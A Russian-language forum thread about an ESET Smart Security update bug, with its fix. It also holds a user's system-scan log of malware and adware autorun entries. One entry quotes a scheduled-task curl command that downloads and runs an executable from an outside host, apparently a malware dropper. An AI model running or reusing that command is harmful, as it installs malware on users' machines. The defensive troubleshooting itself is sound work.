Баз данных сигнатур вирусов устарела , обновление не помогает

RSS
Добрый день, на домашней странице программа пишет грозное уведомление "Баз данных сигнатур вирусов устарела" , после попытки обновиться
пишет "обновление не требуется" ....типа всё актуально.
Последнее успешное обновление 5 июня, версия баз данных 14855
Что не так? что исправить, чтобы обновления проходили корректно?
версия ESET SS 10.0.390.0

Ответы

http://rgho.st/private/8THrMSZtg/94e876a7a2409d0c218e610d790b94d6
бесполезно....(( а переустановка может поможет?
По правде говоря, описанный топик-стартером случай - известный баг версии 10.0.390, о нём не раз писали на официальном форуме разработчиков. Дмитрий Столяров, попробуйте переключить временно режим обновления на Тестовое и попытайтесь обновиться. Если прошло успешно - переключайтесь на Регулярное

Если проблема осталась, надёжнее всего поступить так. Выполните полное удаление, как описано здесь - https://www.esetnod32.ru/support/knowledge_base/solution/?ELEMENT_ID=852896
В зависимости от разрядности системы скачайте дистрибутив актуальной версии по ссылкам ниже:

https://download.eset.com/com/eset/apps/home/ess/windows/latest/ess_nt64_rus.msi
https://download.eset.com/com/eset/apps/home/ess/windows/latest/ess_nt32_rus.msi

Установите и активируйте программу
Изменено: Вячеслав Букас - 07.07.2017 11:48:50
спасибо, вариант с Тестовым режимом обновления решил проблему.
В системе было много лишнего в том числе и рекламные агенты.
для нормальной работы требовалась очистка.
Цитата
RP55 RP55 написал:
В системе было много лишнего в том числе и рекламные агенты

Бегло прошёлся по тексту скриптов. Amigo - всего лишь альтернативный интернет-браузер, Mail.ru-агент - безобидный интернет-мессенджер, Zona - торрент-клиент, ACRORD32INFO.EXE - модуль программы для просмотра PDF-документов от Adobe, Adguard - программа-блокировщик рекламы от известного разработчика. RP55 RP55, неужели, по-Вашему, все они могут блокировать обновление ESET? А вот это верх всего - HASPLMS.EXE, один из модулей программы защиты ключа от ALADDIN Software. Её использует, например, российская компания АСКОН в составе пакета Kompas-3D - мощного приложения для трёхмерного моделирования

Цитата
RP55 RP55 написал:
для нормальной работы требовалась очистка

Нужно всего-то было переключить режим обновления туда-обратно. Хорошо, что система у человека осталась жива, но проблем в работе некоторых программ после такой очистки не избежать
Вячеслав Букас

Кто лучше оценивает ситуацию
Вы или я ?
Mail.ru-агент - а кто его трогал ?

Amigo - нет в системе ( есть ведущие в никуда ярлыки )
HASPLMS.EXE   - Файла нет в системе.
ACRORD32INFO.EXE - Файла нет в системе.
Zona ( см. пункт 3 )

ADGUARD - часто источник проблем.
Если он нужен то _ после_ того как проблема решена его ровно 5 минут переустановить.


____________________
1)  
Полное имя                  HTTP://AMTOMIL.RU/F.EXE
Имя файла                   HTTP://AMTOMIL.RU/F.EXE
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                           
Доп. информация             на момент обновления списка
CmdLine                     -F -L "HTTP://AMTOMIL.RU/F.EXE" -O "C:\USERS\ДМИТРИЙ\APPDATA\ROAMING\CURL\CURL.EXE"
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\CURL
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6B7F9B0-7F11-4A76-901A-E9AD930612DE}\Actions
Actions                     "C:\Users\Дмитрий\AppData\Roaming\curl\curl_7_54.exe" -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Дмитрий\AppData\Roaming\curl\curl.exe"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6B7F9B0-7F11-4A76-901A-E9AD930612DE}\

_____________________
2) Полное имя                  C:\USERS\ДМИТРИЙ\APPDATA\LOCAL\SVSHOST\SVSHOST.EXE
Имя файла                   SVSHOST.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

                           
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ в автозапуске
Инф. о файле                Не удается найти указанный файл.
Цифр. подпись               проверка не производилась
                           
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла               Типичен для вирусов и троянов
Имя файла                   Имя файла слишком похоже на имя известного модуля SVCHOST.EXE
                           
Доп. информация             на момент обновления списка
CmdLine                     --STID="14712"
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\SVSHOST
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A612A43-201F-4756-9F69-0E0E7482EFE4}\Actions
Actions                     "C:\Users\Дмитрий\AppData\Local\svshost\svshost.exe" --stid="14712"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0A612A43-201F-4756-9F69-0E0E7482EFE4}\

3) ZONA = potentially unwanted

Полное имя                  C:\PROGRAM FILES (X86)\ZONA\ZONA.EXE
Имя файла                   ZONA.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ [Запускался неявно или вручную]
                           
www.virustotal.com          2017-07-06
K7GW                        Unwanted-Program ( 005009ce1 )
K7AntiVirus                 Unwanted-Program ( 005009ce1 )
DrWeb                       Program.Zona.86
Endgame                     malicious (moderate confidence)
ESET-NOD32                  a variant of Win32/ZvuZona.I potentially unwanted
                           
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ [Запускался неявно или вручную]
File_Id                     579897981A5000
Linker                      10.0
Размер                      1710256 байт
Создан                      08.03.2017 в 23:19:24
Изменен                     08.03.2017 в 23:19:24
                           
TimeStamp                   27.07.2016 в 11:14:32
EntryPoint                  +
OS Version                  5.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано "Chetvertoe pokolenie, OOO"
                           
Версия файла                1.0.7.6
Описание                    Zona
Производитель               4th generation
                           
Доп. информация             на момент обновления списка
SHA1                        0A9C80026F31DBEED9C29D681EC09432803F3022
MD5                         3264D23F1998FB7EE67F78B796D78840
                           
Ссылки на объект            
SHORTCUT                    C:\USERS\ДМИТРИЙ\DESKTOP\Zona.lnk
SHORTCUT                    C:\USERS\ДМИТРИЙ\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\Zona.lnk
                           

4)
Полное имя                  C:\USERS\ДМИТРИЙ\APPDATA\LOCAL\SEARCHGO\SEARCHGO.EXE
Имя файла                   SEARCHGO.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
www.virustotal.com          2017-07-06

Kaspersky                 AdWare.Win32.Searchgo.n

DrWeb                       Trojan.LoadMoney.2303

Microsoft                   Adware:Win32/Searchgo

ESET-NOD32              a variant of Win32/Adware.SearchGo.B


Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     592FF79B6F000
Linker                      12.0
Размер                      431320 байт
Создан                      05.07.2017 в 19:24:46
Изменен                     05.07.2017 в 19:27:28
                           
TimeStamp                   01.06.2017 в 11:16:43
EntryPoint                  +
OS Version                  5.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано "OOO ""Meti-Vostok"""
                           
Версия файла                1.0.0.278
Описание                    Searchgo component
Производитель               Searchgo
                           
Доп. информация             на момент обновления списка
SHA1                        A388241E2682E77F40250B32383DAB1BDB15BE59
MD5                         49E0AF2C4D0870B3187669D61FA65415
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\SEARCHGO TASK
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D3D1CBA2-41A6-4845-BBF8-CFC76D274166}\Actions
Actions                     "C:\Users\Дмитрий\AppData\Local\SearchGo\searchgo.exe"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D3D1CBA2-41A6-4845-BBF8-CFC76D274166}\

5)
Полное имя                  C:\USERS\ДМИТРИЙ\APPDATA\ROAMING\MICROSOFT\MSI.EXE
Имя файла                   MSI.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
www.virustotal.com          2017-07-05

Kaspersky                   UDS:DangerousObject.Multi.Generic

DrWeb                       Trojan.LoadMoney.2399

Avira                       TR/Crypt.ZPACK.Gen

                           

Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     595CDBA9282000
Linker                      6.0
Размер                      2634720 байт
Создан                      05.07.2017 в 19:18:36
Изменен                     05.07.2017 в 19:22:13
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  R/O  
                           
TimeStamp                   05.07.2017 в 12:29:29
EntryPoint                  +
OS Version                  4.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано LLC KORE
                           
Доп. информация             на момент обновления списка
CmdLine                     CNT=1 FTS="KMS-AKTIVATOR__OODFELLO\KMS-AKTIVATOR__OODFELLO.EXE"
SHA1                        12E8C0F40502E8C6B19720BE0E1761B07B16E8D7
MD5                         149F40495F4BE3BB3179D11067949B1D
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MSI
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CA332735-3D52-4563-BB36-576F3352295F}\Actions
Actions                     "C:\Users\Дмитрий\AppData\Roaming\Microsoft\msi.exe" cnt=1 fts="kms-aktivator__oodfello\kms-aktivator__oodfello.exe"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CA332735-3D52-4563-BB36-576F3352295F}\
                           

6) C:\WINDOWS\SYSTEM32\EA3HOST.EXE
Kaspersky  not-a-virus:RiskTool.Win32.Agent.aojt
DrWeb  Trojan.LoadMoney.2356                    
_________
И помимо этого мусор от:
KINGOSOFT
и т.д.
Изменено: RP55 RP55 - 07.07.2017 19:45:36
Читают тему (гостей: 1)